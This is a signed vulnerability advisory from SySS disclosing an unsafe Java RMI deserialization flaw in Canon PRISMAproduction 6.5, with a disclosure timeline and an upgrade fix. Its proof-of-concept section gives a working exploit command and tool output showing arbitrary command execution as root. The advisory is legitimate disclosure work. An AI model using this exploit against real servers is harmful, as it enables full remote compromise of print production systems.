-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2026-003 Product: PRISMAproduction Manufacturer: Canon Europe Ltd Affected Version(s): 6.5 or earlier Tested Version(s): 6.5 Vulnerability Type: Deserialization of Untrusted Data (CWE-502) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2026-01-29 Solution Date: 2026-07-30 Public Disclosure: 2026-07-30 CVE Reference: CVE-2026-3245 Author of Advisory: Anton Fabricius and Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: PRISMAproduction is Canon's professional workflow software that simplifies print production, improves efficiency, and ensures consistent, high-quality output. The manufacturer describes the product as follows (see [1]): "PRISMAproduction is a high-performance workflow and output management system for production print." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The PRISMAproduction server exposes a Java Remote Method Invocation (RMI) registry service on port 1205 as well as the corresponding RMI Remote Object Reference service on TCP port 1206, which are used for client-server communication. The RMI protocol relies heavily on Java's serialization mechanism, which in turn is vulnerable to so-called deserialization attacks. In combination with a large number of commonly used Java libraries (see [2]), known attack vectors exist that allow attackers to achieve code execution on the target system by processing specially crafted requests. Using internal tooling, SySS identified three exploitable libraries (Rhino, hibernate-validator, and beanutils). Exploitation requires knowledge of a method signature including object parameters. These can be obtained by analyzing (the) client components. Since object types accepted during deserialization are not filtered, SySS was able to execute arbitrary system commands on the PRISMAproduction server. Since the PRISMAproduction application runs under the user root, the server can be fully compromised. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): For exploitation, the remote object FcbServer with its saveModifiedFcbs method was used. Other available remote objects are exploitable as well. On the attackers host: ~/pyjavaser % python3 -m pyjavaser.rmiaudit vuln.prisma-host.local -p 1205 --exploit --include-ref=FcbServer --custom-sig="saveModifiedFcbs(Ljava/util/Map;)V" -- /bin/sh -c 'whoami > /tmp/poc.txt' [INFO] Scanning vuln.prisma-host.local:1205 (tls: False) [INFO] Found RMI Registry with 51 objects registered [GOOD] Registry.lookup() name argument not processed as an object [GOOD] Registry is read-only [INFO] rebind() access check before deserialization [GOOD] DGC dirty() is filtered [INFO] Checking custom object (FcbServer - ['java.rmi.Remote', 'com.oce.prismapro.remote.MultiInstanceServer', 'com.oce.prismapro.config.fcb.FcbServer']) [INFO] RMI FcbServer (java.rmi.Remote,com.oce.prismapro.remote.MultiInstanceServer,com.oce.prismapro.config.fcb.FcbServer) is a new-style object [INFO] Trying method opnum:-1 hash:1264638608476116449 sig:saveModifiedFcbs(Ljava/util/Map;)V baseargs:[None] argidx:0 [VULN] Custom object exploitable with gadgets ['hashdos', 'beanutils', 'hibernate-validator', 'rhino'] [INFO] Excluding object ResourceSynchronizer pointing to vuln.prisma-host.local:1206 [...] [INFO] Found 1 attack vector(s), gadgets ['hashdos', 'beanutils', 'rhino', 'hibernate-validator'] [VULN] Vulnerabilities identified: [INFO] Auto-detected local HTTP server URL http://10.10.10.24:8080/ [VULN] # Unsafe deserialization (RMIDeserializationVector) @ vuln.prisma-host.local:1206, gadgets: ['hashdos', 'beanutils', 'hibernate-validator','rhino'] [INFO] -> Trying beanutils [INFO] java.lang.ClassCastException occured delivering payload, this is likely expected On the vulnerable server: /tmp % cat poc.txt root ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Upgrade to version 6.5.1 or higher. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2026-01-24: Vulnerability discovered 2026-01-29: Vulnerability reported to manufacturer 2026-02-26: Vulnerability reproduced and confirmed by manufacturer 2026-07-30: Security advisory released by manufacturer (see [3]) 2026-08-04: Security advisory released by SySS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product brochure for PRISMAproduction https://canon.a.bigcontent.io/v1/static/PRISMAproduction_Brochure_EM [2] Proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization https://github.com/frohoff/ysoserial [3] Canon Security Advisory for CVE-2026-3245 https://cpp.canon/vulnerability-in-prismaproduction-cve-2026-3245/ [4] SySS Security Advisory SYSS-2026-003 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-003.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Anton Fabricius and Moritz Bechler of SySS GmbH. E-Mail: anton.fabricius@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Anton_Fabricius.asc Key ID: 0xB2ED52BF0DEAC709 Key Fingerprint: 3476 F352 EBC1 F702 5048 B573 B2ED 52BF 0DEA C709 E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEENHbzUuvB9wJQSLVzsu1Svw3qxwkFAmpxsckACgkQsu1Svw3q xwnlaBAAnbDBTpvCQGxjtfJnMRPnQZRnuald0bSshTW74LAc9xVjqPk4xmZ2OHCN B5GjaD+qqJnsXLnp9Q9J67L67GCrYH+oPifQxJVC8Xl6PbfONufib/Glki9oyVax WQ5ZD0QYhs4vkLioCTCa+EjaBm1ZcZJLEtuS/gBYb4U60eNsFMqLoNguhWFQzuJz RUmfgS5DgFL5JI0S4VYkSu/ATulGyRs5aFrwaijIGqZH4GDCBHmhd5gtvkc0jMOD ufzUGx9LAlmvTyQdN4kYvctLc3Vy2OD00C0f/V7Fk/u+jJEUY6OP8S41Q1XPxOwO MuYc1dtDaoAyIo9sfSdXwG7yP81HBfJU741B+Q0QBacdFSKgYWezL6IwLWeQ9yAV Ziu8CMzF88eqT/EjKXXzUJwT2G4DQa+pz45lVk4stE0S/Bom13nydABb0zeaaDe5 88cHg7i7wl6JAlcZrEKPbYiDR7NOJo8Sar+UXQReDlFULc5olU5bG6mqMyMEBtIQ jquOv854iLk9Gi2Kz0s5xF4oeTwSL5Rbw13oTlO9Qa/tTyQozayE8XKyfLNiOihG qsLiKQoSnuHUYoMpWijvcKXDWwiKCykmN2lrigql6zVDvkNh5lMaxOYqmVCVWx/P DSSxM6gem4FGRk+Mj6RnwUyeucZLBd0xMdchTHrXGq+z0j8ODHc= =QWls -----END PGP SIGNATURE-----